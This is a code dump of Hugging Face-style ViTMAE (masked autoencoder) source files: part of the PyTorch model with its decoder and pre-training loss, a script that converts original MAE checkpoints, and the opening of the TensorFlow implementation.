            if module.bias is not None:
                module.bias.data.zero_()

    def _set_gradient_checkpointing(self, module, value=False):
        # Only the encoder supports checkpointing; toggle its flag in place.
        if isinstance(module, ViTMAEEncoder):
            module.gradient_checkpointing = value
VIT_MAE_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. Use it
as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`ViTMAEConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
VIT_MAE_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See [`ViTImageProcessor.__call__`]
for details.
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
    "The bare ViTMAE Model transformer outputting raw hidden-states without any specific head on top.",
    VIT_MAE_START_DOCSTRING,
)
class ViTMAEModel(ViTMAEPreTrainedModel):
    def __init__(self, config):
        super().__init__(config)
        self.config = config
        self.embeddings = ViTMAEEmbeddings(config)
        self.encoder = ViTMAEEncoder(config)
        self.layernorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        # Initialize weights and apply final processing
        self.post_init()

    def get_input_embeddings(self):
        # The patch projection acts as the input embedding layer.
        return self.embeddings.patch_embeddings

    def _prune_heads(self, heads_to_prune):
        """
        Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
        class PreTrainedModel
        """
        for layer_index, heads in heads_to_prune.items():
            self.encoder.layer[layer_index].attention.prune_heads(heads)

    @add_start_docstrings_to_model_forward(VIT_MAE_INPUTS_DOCSTRING)
    @replace_return_docstrings(output_type=ViTMAEModelOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        pixel_values: Optional[torch.FloatTensor] = None,
        noise: Optional[torch.FloatTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, ViTMAEModelOutput]:
        r"""
        Returns:
        Examples:
        ```python
        >>> from transformers import AutoImageProcessor, ViTMAEModel
        >>> from PIL import Image
        >>> import requests
        >>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
        >>> image = Image.open(requests.get(url, stream=True).raw)
        >>> image_processor = AutoImageProcessor.from_pretrained("facebook/vit-mae-base")
        >>> model = ViTMAEModel.from_pretrained("facebook/vit-mae-base")
        >>> inputs = image_processor(images=image, return_tensors="pt")
        >>> outputs = model(**inputs)
        >>> last_hidden_states = outputs.last_hidden_state
        ```"""
        # Fall back to the configuration defaults for unset flags.
        if output_attentions is None:
            output_attentions = self.config.output_attentions
        if output_hidden_states is None:
            output_hidden_states = self.config.output_hidden_states
        if return_dict is None:
            return_dict = self.config.use_return_dict
        if pixel_values is None:
            raise ValueError("You have to specify pixel_values")
        # Broadcast the head mask to one entry per layer (1.0 keeps a head); the
        # encoder receives shape [num_hidden_layers x batch x num_heads x seq x seq].
        head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
        embedding_output, mask, ids_restore = self.embeddings(pixel_values, noise=noise)
        encoder_outputs = self.encoder(
            embedding_output,
            head_mask=head_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        sequence_output = self.layernorm(encoder_outputs[0])
        if not return_dict:
            return (sequence_output, mask, ids_restore) + encoder_outputs[1:]
        return ViTMAEModelOutput(
            last_hidden_state=sequence_output,
            mask=mask,
            ids_restore=ids_restore,
            hidden_states=encoder_outputs.hidden_states,
            attentions=encoder_outputs.attentions,
        )
class ViTMAEDecoder(nn.Module):
    """Lightweight Transformer decoder that reconstructs pixel patches from the
    encoder's visible tokens plus a shared learnable mask token per hidden patch."""

    def __init__(self, config, num_patches):
        super().__init__()
        self.decoder_embed = nn.Linear(config.hidden_size, config.decoder_hidden_size, bias=True)
        # Single learnable embedding standing in for every masked patch.
        self.mask_token = nn.Parameter(torch.zeros(1, 1, config.decoder_hidden_size))
        self.decoder_pos_embed = nn.Parameter(
            torch.zeros(1, num_patches + 1, config.decoder_hidden_size), requires_grad=False
        )  # fixed sin-cos embedding
        # The decoder reuses ViTMAELayer but with its own (typically smaller) dimensions.
        decoder_config = deepcopy(config)
        decoder_config.hidden_size = config.decoder_hidden_size
        decoder_config.num_hidden_layers = config.decoder_num_hidden_layers
        decoder_config.num_attention_heads = config.decoder_num_attention_heads
        decoder_config.intermediate_size = config.decoder_intermediate_size
        self.decoder_layers = nn.ModuleList(
            [ViTMAELayer(decoder_config) for _ in range(config.decoder_num_hidden_layers)]
        )
        self.decoder_norm = nn.LayerNorm(config.decoder_hidden_size, eps=config.layer_norm_eps)
        # Final head predicting the flattened pixels of each patch.
        self.decoder_pred = nn.Linear(
            config.decoder_hidden_size, config.patch_size**2 * config.num_channels, bias=True
        )  # encoder to decoder
        self.gradient_checkpointing = False
        self.config = config
        self.initialize_weights(num_patches)

    def initialize_weights(self, num_patches):
        """Fill the frozen sin-cos position table and initialize the mask token."""
        # initialize (and freeze) position embeddings by sin-cos embedding
        decoder_pos_embed = get_2d_sincos_pos_embed(
            self.decoder_pos_embed.shape[-1], int(num_patches**0.5), add_cls_token=True
        )
        self.decoder_pos_embed.data.copy_(torch.from_numpy(decoder_pos_embed).float().unsqueeze(0))
        # timm's trunc_normal_(std=.02) is effectively normal_(std=0.02) as cutoff is too big (2.)
        torch.nn.init.normal_(self.mask_token, std=self.config.initializer_range)

    def forward(
        self,
        hidden_states,
        ids_restore,
        output_attentions=False,
        output_hidden_states=False,
        return_dict=True,
    ):
        """Reconstruct per-patch pixel logits from the encoder's visible tokens.

        `hidden_states` holds CLS + visible tokens; `ids_restore` is the inverse
        permutation produced by random masking, used to put mask tokens back in
        their original patch positions.
        """
        # embed tokens
        x = self.decoder_embed(hidden_states)
        # append mask tokens to sequence
        mask_tokens = self.mask_token.repeat(x.shape[0], ids_restore.shape[1] + 1 - x.shape[1], 1)
        x_ = torch.cat([x[:, 1:, :], mask_tokens], dim=1)  # no cls token
        # Gather with the inverse permutation restores the original patch order.
        x_ = torch.gather(x_, dim=1, index=ids_restore.unsqueeze(-1).repeat(1, 1, x.shape[2]))  # unshuffle
        x = torch.cat([x[:, :1, :], x_], dim=1)  # append cls token
        # add pos embed
        hidden_states = x + self.decoder_pos_embed
        # apply Transformer layers (blocks)
        all_hidden_states = () if output_hidden_states else None
        all_self_attentions = () if output_attentions else None
        for i, layer_module in enumerate(self.decoder_layers):
            if output_hidden_states:
                all_hidden_states = all_hidden_states + (hidden_states,)
            if self.gradient_checkpointing and self.training:
                # Recompute activations in the backward pass to save memory.
                def create_custom_forward(module):
                    def custom_forward(*inputs):
                        return module(*inputs, output_attentions)
                    return custom_forward
                layer_outputs = torch.utils.checkpoint.checkpoint(
                    create_custom_forward(layer_module),
                    hidden_states,
                    None,
                )
            else:
                layer_outputs = layer_module(hidden_states, head_mask=None, output_attentions=output_attentions)
            hidden_states = layer_outputs[0]
            if output_attentions:
                all_self_attentions = all_self_attentions + (layer_outputs[1],)
        if output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)
        hidden_states = self.decoder_norm(hidden_states)
        # predictor projection
        logits = self.decoder_pred(hidden_states)
        # remove cls token
        logits = logits[:, 1:, :]
        if not return_dict:
            return tuple(v for v in [logits, all_hidden_states, all_self_attentions] if v is not None)
        return ViTMAEDecoderOutput(
            logits=logits,
            hidden_states=all_hidden_states,
            attentions=all_self_attentions,
        )
@add_start_docstrings(
"""The ViTMAE Model transformer with the decoder on top for self-supervised pre-training.
<Tip>
Note that we provide a script to pre-train this model on custom data in our [examples
directory](https://github.com/huggingface/transformers/tree/main/examples/pytorch/image-pretraining).
</Tip>
""",
VIT_MAE_START_DOCSTRING,
)
class ViTMAEForPreTraining(ViTMAEPreTrainedModel):
    def __init__(self, config):
        super().__init__(config)
        self.config = config
        # Encoder: ViT backbone that embeds, masks, and encodes visible patches.
        self.vit = ViTMAEModel(config)
        # Decoder: reconstructs pixel patches from visible tokens + mask tokens.
        self.decoder = ViTMAEDecoder(config, num_patches=self.vit.embeddings.num_patches)
        # Initialize weights and apply final processing
        self.post_init()
    def get_input_embeddings(self):
        # The patch projection of the wrapped ViT acts as the input embedding layer.
        return self.vit.embeddings.patch_embeddings
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
def patchify(self, pixel_values):
"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values.
Returns:
`torch.FloatTensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
Patchified pixel values.
"""
patch_size, num_channels = self.config.patch_size, self.config.num_channels
# sanity checks
if (pixel_values.shape[2] != pixel_values.shape[3]) or (pixel_values.shape[2] % patch_size != 0):
raise ValueError("Make sure the pixel values have a squared size that is divisible by the patch size")
if pixel_values.shape[1] != num_channels:
raise ValueError(
"Make sure the number of channels of the pixel values is equal to the one set in the configuration"
)
# patchify
batch_size = pixel_values.shape[0]
num_patches_one_direction = pixel_values.shape[2] // patch_size
patchified_pixel_values = pixel_values.reshape(
batch_size, num_channels, num_patches_one_direction, patch_size, num_patches_one_direction, patch_size
)
patchified_pixel_values = torch.einsum("nchpwq->nhwpqc", patchified_pixel_values)
patchified_pixel_values = patchified_pixel_values.reshape(
batch_size, num_patches_one_direction * num_patches_one_direction, patch_size**2 * num_channels
)
return patchified_pixel_values
def unpatchify(self, patchified_pixel_values):
"""
Args:
patchified_pixel_values (`torch.FloatTensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
Patchified pixel values.
Returns:
`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`:
Pixel values.
"""
patch_size, num_channels = self.config.patch_size, self.config.num_channels
num_patches_one_direction = int(patchified_pixel_values.shape[1] ** 0.5)
# sanity check
if num_patches_one_direction**2 != patchified_pixel_values.shape[1]:
raise ValueError("Make sure that the number of patches can be squared")
# unpatchify
batch_size = patchified_pixel_values.shape[0]
patchified_pixel_values = patchified_pixel_values.reshape(
batch_size,
num_patches_one_direction,
num_patches_one_direction,
patch_size,
patch_size,
num_channels,
)
patchified_pixel_values = torch.einsum("nhwpqc->nchpwq", patchified_pixel_values)
pixel_values = patchified_pixel_values.reshape(
batch_size,
num_channels,
num_patches_one_direction * patch_size,
num_patches_one_direction * patch_size,
)
return pixel_values
def forward_loss(self, pixel_values, pred, mask):
"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values.
pred (`torch.FloatTensor` of shape `(batch_size, num_patches, patch_size**2 * num_channels)`:
Predicted pixel values.
mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`):
Tensor indicating which patches are masked (1) and which are not (0).
Returns:
`torch.FloatTensor`: Pixel reconstruction loss.
"""
target = self.patchify(pixel_values)
if self.config.norm_pix_loss:
mean = target.mean(dim=-1, keepdim=True)
var = target.var(dim=-1, keepdim=True)
target = (target - mean) / (var + 1.0e-6) ** 0.5
loss = (pred - target) ** 2
loss = loss.mean(dim=-1) # [N, L], mean loss per patch
loss = (loss * mask).sum() / mask.sum() # mean loss on removed patches
return loss
@add_start_docstrings_to_model_forward(VIT_MAE_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=ViTMAEForPreTrainingOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
pixel_values: Optional[torch.FloatTensor] = None,
noise: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, ViTMAEForPreTrainingOutput]:
r"""
Returns:
Examples:
```python
>>> from transformers import AutoImageProcessor, ViTMAEForPreTraining
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> image_processor = AutoImageProcessor.from_pretrained("facebook/vit-mae-base")
>>> model = ViTMAEForPreTraining.from_pretrained("facebook/vit-mae-base")
>>> inputs = image_processor(images=image, return_tensors="pt")
>>> outputs = model(**inputs)
>>> loss = outputs.loss
>>> mask = outputs.mask
>>> ids_restore = outputs.ids_restore
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.vit(
pixel_values,
noise=noise,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
latent = outputs.last_hidden_state
ids_restore = outputs.ids_restore
mask = outputs.mask
decoder_outputs = self.decoder(latent, ids_restore)
logits = decoder_outputs.logits # shape (batch_size, num_patches, patch_size*patch_size*num_channels)
loss = self.forward_loss(pixel_values, logits, mask)
if not return_dict:
output = (logits, mask, ids_restore) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return ViTMAEForPreTrainingOutput(
loss=loss,
logits=logits,
mask=mask,
ids_restore=ids_restore,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 7,532 | src/transformers/models/vit_mae/convert_vit_mae_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert ViT MAE checkpoints from the original repository: https://github.com/facebookresearch/mae"""
import argparse
import requests
import torch
from PIL import Image
from transformers import ViTMAEConfig, ViTMAEFeatureExtractor, ViTMAEForPreTraining
def rename_key(name):
    """Translate one original-MAE parameter name into its HF ViTMAE equivalent.

    Substitutions are applied in order on the progressively rewritten name.
    Rules flagged `encoder_only` are skipped whenever the (possibly already
    rewritten) name refers to a decoder parameter.
    """
    # (old, new, encoder_only) — order matters: e.g. "attn.proj" must be
    # rewritten before the bare "attn" rule, and "decoder_blocks" before "blocks".
    substitutions = (
        ("cls_token", "vit.embeddings.cls_token", False),
        ("mask_token", "decoder.mask_token", False),
        ("decoder_pos_embed", "decoder.decoder_pos_embed", False),
        ("pos_embed", "vit.embeddings.position_embeddings", True),
        ("patch_embed.proj", "vit.embeddings.patch_embeddings.projection", False),
        ("patch_embed.norm", "vit.embeddings.norm", False),
        ("decoder_blocks", "decoder.decoder_layers", False),
        ("blocks", "vit.encoder.layer", False),
        ("attn.proj", "attention.output.dense", False),
        ("attn", "attention.self", False),
        ("norm1", "layernorm_before", False),
        ("norm2", "layernorm_after", False),
        ("mlp.fc1", "intermediate.dense", False),
        ("mlp.fc2", "output.dense", False),
        ("decoder_embed", "decoder.decoder_embed", False),
        ("decoder_norm", "decoder.decoder_norm", False),
        ("decoder_pred", "decoder.decoder_pred", False),
        ("norm.weight", "vit.layernorm.weight", True),
        ("norm.bias", "vit.layernorm.bias", True),
    )
    for old, new, encoder_only in substitutions:
        if old in name and not (encoder_only and "decoder" in name):
            name = name.replace(old, new)
    return name
def convert_state_dict(orig_state_dict, config):
    """Map original-MAE checkpoint keys to HF ViTMAE parameter names, in place.

    Fused `qkv` weights/biases are split into separate query/key/value tensors
    (the fused tensor stacks q, k, v along dim 0); every other key is renamed
    via `rename_key`. Returns the (mutated) state dict.
    """
    for key in list(orig_state_dict.keys()):
        val = orig_state_dict.pop(key)

        if "qkv" in key:
            # Keys look like "blocks.<n>.attn.qkv.weight" — index 1 is the layer.
            layer_num = int(key.split(".")[1])
            # Decoder blocks use the (smaller) decoder hidden size.
            if "decoder_blocks" in key:
                dim = config.decoder_hidden_size
                prefix = "decoder.decoder_layers."
            else:
                dim = config.hidden_size
                prefix = "vit.encoder.layer."
            base = f"{prefix}{layer_num}.attention.attention"
            if "weight" in key:
                orig_state_dict[f"{base}.query.weight"] = val[:dim, :]
                orig_state_dict[f"{base}.key.weight"] = val[dim : dim * 2, :]
                orig_state_dict[f"{base}.value.weight"] = val[-dim:, :]
            elif "bias" in key:
                orig_state_dict[f"{base}.query.bias"] = val[:dim]
                orig_state_dict[f"{base}.key.bias"] = val[dim : dim * 2]
                orig_state_dict[f"{base}.value.bias"] = val[-dim:]
        else:
            orig_state_dict[rename_key(key)] = val

    return orig_state_dict
def convert_vit_mae_checkpoint(checkpoint_url, pytorch_dump_folder_path):
    """Download an original MAE checkpoint, convert it to HF format, verify, and save.

    Args:
        checkpoint_url: URL of the original `.pth` checkpoint; "large"/"huge" in
            the URL selects the matching architecture (default is "base").
        pytorch_dump_folder_path: Directory where the converted model and
            feature extractor are written.

    Raises:
        AssertionError: If the converted model's logits do not match the
            hard-coded reference values for that checkpoint.
    """
    config = ViTMAEConfig()
    if "large" in checkpoint_url:
        config.hidden_size = 1024
        config.intermediate_size = 4096
        config.num_hidden_layers = 24
        config.num_attention_heads = 16
    elif "huge" in checkpoint_url:
        config.patch_size = 14
        config.hidden_size = 1280
        config.intermediate_size = 5120
        config.num_hidden_layers = 32
        config.num_attention_heads = 16

    model = ViTMAEForPreTraining(config)

    state_dict = torch.hub.load_state_dict_from_url(checkpoint_url, map_location="cpu")["model"]
    new_state_dict = convert_state_dict(state_dict, config)
    model.load_state_dict(new_state_dict)
    model.eval()

    url = "https://user-images.githubusercontent.com/11435359/147738734-196fd92f-9260-48d5-ba7e-bf103d29364d.jpg"
    image = Image.open(requests.get(url, stream=True).raw)

    # Build the feature extractor once (it was previously instantiated twice,
    # with the first instance unused).
    feature_extractor = ViTMAEFeatureExtractor(size=config.image_size)
    inputs = feature_extractor(images=image, return_tensors="pt")

    # forward pass — seeded so the random patch masking is reproducible and
    # matches the reference logits below
    torch.manual_seed(2)
    outputs = model(**inputs)
    logits = outputs.logits

    if "large" in checkpoint_url:
        expected_slice = torch.tensor(
            [[-0.7309, -0.7128, -1.0169], [-1.0161, -0.9058, -1.1878], [-1.0478, -0.9411, -1.1911]]
        )
    elif "huge" in checkpoint_url:
        expected_slice = torch.tensor(
            [[-1.1599, -0.9199, -1.2221], [-1.1952, -0.9269, -1.2307], [-1.2143, -0.9337, -1.2262]]
        )
    else:
        expected_slice = torch.tensor(
            [[-0.9192, -0.8481, -1.1259], [-1.1349, -1.0034, -1.2599], [-1.1757, -1.0429, -1.2726]]
        )

    # verify logits
    assert torch.allclose(logits[0, :3, :3], expected_slice, atol=1e-4)

    print(f"Saving model to {pytorch_dump_folder_path}")
    model.save_pretrained(pytorch_dump_folder_path)

    print(f"Saving feature extractor to {pytorch_dump_folder_path}")
    feature_extractor.save_pretrained(pytorch_dump_folder_path)
if __name__ == "__main__":
    # CLI entry point: parse arguments, then download + convert the checkpoint.
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument(
        "--checkpoint_url",
        type=str,
        default="https://dl.fbaipublicfiles.com/mae/visualize/mae_visualize_vit_base.pth",
        help="URL of the checkpoint you'd like to convert.",
    )
    arg_parser.add_argument(
        "--pytorch_dump_folder_path", type=str, default=None, help="Path to the output PyTorch model directory."
    )
    cli_args = arg_parser.parse_args()
    convert_vit_mae_checkpoint(cli_args.checkpoint_url, cli_args.pytorch_dump_folder_path)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 49,403 | src/transformers/models/vit_mae/modeling_tf_vit_mae.py | # coding=utf-8
# Copyright 2022 Facebook AI and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" TF 2.0 ViT MAE (masked autoencoder) model."""
import collections.abc
import math
from copy import deepcopy
from dataclasses import dataclass
from typing import Dict, Optional, Tuple, Union
import numpy as np
import tensorflow as tf
from ...activations_tf import get_tf_activation
from ...file_utils import (
ModelOutput,
add_start_docstrings,
add_start_docstrings_to_model_forward,
replace_return_docstrings,
)
from ...modeling_tf_outputs import TFBaseModelOutput
from ...modeling_tf_utils import (
TFModelInputType,
TFPreTrainedModel,
get_initializer,
keras_serializable,
unpack_inputs,
)
from ...tf_utils import shape_list, stable_softmax
from ...utils import logging
from .configuration_vit_mae import ViTMAEConfig
# Module-level logger for this file.
logger = logging.get_logger(__name__)
# Placeholders consumed by the shared docstring decorators below.
_CONFIG_FOR_DOC = "ViTMAEConfig"
_CHECKPOINT_FOR_DOC = "facebook/vit-mae-base"
@dataclass
class TFViTMAEModelOutput(ModelOutput):
    """
    Class for TFViTMAEModel's outputs, with potential hidden states and attentions.
    Args:
        last_hidden_state (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`):
            Sequence of hidden-states at the output of the last layer of the model.
        mask (`tf.Tensor` of shape `(batch_size, sequence_length)`):
            Tensor indicating which patches are masked (1) and which are not (0).
        ids_restore (`tf.Tensor` of shape `(batch_size, sequence_length)`):
            Tensor containing the original index of the (shuffled) masked patches.
        hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape
            `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus
            the initial embedding outputs.
        attentions (`tuple(tf.Tensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `tf.Tensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
            the self-attention heads.
    """
    # Fields default to None so the ModelOutput can be built field-by-field.
    last_hidden_state: tf.Tensor = None
    mask: tf.Tensor = None
    ids_restore: tf.Tensor = None
    hidden_states: Optional[Tuple[tf.Tensor]] = None
    attentions: Optional[Tuple[tf.Tensor]] = None
@dataclass
class TFViTMAEDecoderOutput(ModelOutput):
    """
    Class for TFViTMAEDecoder's outputs, with potential hidden states and attentions.
    Args:
        logits (`tf.Tensor` of shape `(batch_size, sequence_length, patch_size ** 2 * num_channels)`):
            Pixel reconstruction logits.
        hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape
            `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus
            the initial embedding outputs.
        attentions (`tuple(tf.Tensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `tf.Tensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
            the self-attention heads.
    """
    # Fields default to None so the ModelOutput can be built field-by-field.
    logits: tf.Tensor = None
    hidden_states: Optional[Tuple[tf.Tensor]] = None
    attentions: Optional[Tuple[tf.Tensor]] = None
@dataclass
class TFViTMAEForPreTrainingOutput(ModelOutput):
    """
    Class for TFViTMAEForPreTraining's outputs, with potential hidden states and attentions.
    Args:
        loss (`tf.Tensor` of shape `(1,)`):
            Pixel reconstruction loss.
        logits (`tf.Tensor` of shape `(batch_size, sequence_length, patch_size ** 2 * num_channels)`):
            Pixel reconstruction logits.
        mask (`tf.Tensor` of shape `(batch_size, sequence_length)`):
            Tensor indicating which patches are masked (1) and which are not (0).
        ids_restore (`tf.Tensor` of shape `(batch_size, sequence_length)`):
            Tensor containing the original index of the (shuffled) masked patches.
        hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape
            `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus
            the initial embedding outputs.
        attentions (`tuple(tf.Tensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `tf.Tensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
            the self-attention heads.
    """
    # Fields default to None so the ModelOutput can be built field-by-field.
    loss: Optional[tf.Tensor] = None
    logits: tf.Tensor = None
    mask: tf.Tensor = None
    ids_restore: tf.Tensor = None
    hidden_states: Optional[Tuple[tf.Tensor]] = None
    attentions: Optional[Tuple[tf.Tensor]] = None
def get_2d_sincos_pos_embed(embed_dim, grid_size, add_cls_token=False):
    """
    Create 2D sin/cos positional embeddings.
    Args:
        embed_dim (`int`):
            Embedding dimension.
        grid_size (`int`):
            The grid height and width.
        add_cls_token (`bool`, *optional*, defaults to `False`):
            Whether or not to add a classification (CLS) token.
    Returns:
        (`tf.Tensor` of shape (grid_size*grid_size, embed_dim) or (1+grid_size*grid_size, embed_dim): the position
        embeddings (with or without classification token)
    """
    coords = tf.range(grid_size, dtype=tf.float32)
    # meshgrid with the width axis first, matching the original MAE code
    grid = tf.stack(tf.meshgrid(coords, coords), axis=0)
    grid = tf.reshape(grid, [2, 1, grid_size, grid_size])
    pos_embed = get_2d_sincos_pos_embed_from_grid(embed_dim, grid)
    if add_cls_token:
        # prepend an all-zero embedding for the CLS token
        pos_embed = tf.concat([tf.zeros((1, embed_dim)), pos_embed], axis=0)
    return pos_embed
def get_2d_sincos_pos_embed_from_grid(embed_dim, grid):
    """Build (H*W, embed_dim) sin/cos embeddings from a 2-row coordinate grid."""
    if embed_dim % 2 != 0:
        raise ValueError("embed_dim must be even")
    half = embed_dim // 2
    # encode the height and the width coordinates with half of the channels each
    emb_h = get_1d_sincos_pos_embed_from_grid(half, grid[0])  # (H*W, D/2)
    emb_w = get_1d_sincos_pos_embed_from_grid(half, grid[1])  # (H*W, D/2)
    return tf.concat([emb_h, emb_w], axis=1)  # (H*W, D)
def get_1d_sincos_pos_embed_from_grid(embed_dim, pos):
    """
    embed_dim: output dimension for each position pos: a list of positions to be encoded: size (M,) out: (M, D)
    """
    if embed_dim % 2 != 0:
        raise ValueError("embed_dim must be even")
    # frequency for channel i is 1 / 10000^(i / (D/2)), i in [0, D/2)
    omega = 1.0 / 10000 ** (tf.range(embed_dim // 2, dtype="float32") / (embed_dim / 2.0))  # (D/2,)
    positions = tf.reshape(pos, [-1])  # (M,)
    angles = tf.einsum("m,d->md", positions, omega)  # (M, D/2), outer product
    # first half of the channels is the sinusoidal pattern, second half cosine
    return tf.concat([tf.sin(angles), tf.cos(angles)], axis=1)  # (M, D)
class TFViTMAEEmbeddings(tf.keras.layers.Layer):
    """
    Construct the CLS token, position and patch embeddings.
    """
    def __init__(self, config: ViTMAEConfig, **kwargs):
        super().__init__(**kwargs)
        self.patch_embeddings = TFViTMAEPatchEmbeddings(config, name="patch_embeddings")
        # Fixed by the configured image size / patch size.
        self.num_patches = self.patch_embeddings.num_patches
        self.config = config
    def build(self, input_shape: tf.TensorShape):
        # Learnable CLS token; prepended to the patch sequence in call().
        self.cls_token = self.add_weight(
            shape=(1, 1, self.config.hidden_size),
            initializer=tf.random_normal_initializer(stddev=self.config.initializer_range),
            trainable=True,
            name="cls_token",
        )
        self.position_embeddings = self.add_weight(
            shape=(1, self.num_patches + 1, self.config.hidden_size),
            initializer="zeros",
            trainable=False,  # fixed sin-cos embedding
            name="position_embeddings",
        )
        pos_embed = get_2d_sincos_pos_embed(
            self.position_embeddings.shape[-1],
            int(self.patch_embeddings.num_patches**0.5),
            add_cls_token=True,
        )[None, ...]
        # Overwrite the zero-initialized non-trainable weight with the
        # precomputed sin/cos table.
        self.position_embeddings.assign(pos_embed)
        super().build(input_shape)
    def random_masking(self, sequence: tf.Tensor, noise: Optional[tf.Tensor] = None):
        """
        Perform per-sample random masking by per-sample shuffling. Per-sample shuffling is done by argsort random
        noise.
        Args:
            sequence (`tf.Tensor` of shape `(batch_size, sequence_length, dim)`)
            noise (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*) which is
                mainly used for testing purposes to control randomness and maintain the reproducibility
        """
        batch_size, seq_length, dim = shape_list(sequence)
        # Number of patches kept visible to the encoder.
        len_keep = int(seq_length * (1 - self.config.mask_ratio))
        if noise is None:
            noise = tf.random.uniform(shape=(batch_size, seq_length), minval=0.0, maxval=1.0)  # noise in [0, 1)
        # sort noise for each sample
        ids_shuffle = tf.argsort(noise, axis=1)  # ascend: small is keep, large is remove
        # argsort of the argsort gives the inverse permutation, used later to unshuffle
        ids_restore = tf.argsort(ids_shuffle, axis=1)
        # keep the first subset
        ids_keep = ids_shuffle[:, :len_keep]
        sequence_unmasked = tf.gather(
            sequence,
            axis=1,
            batch_dims=1,
            indices=ids_keep,
        )
        # generate the binary mask: 0 is keep, 1 is remove
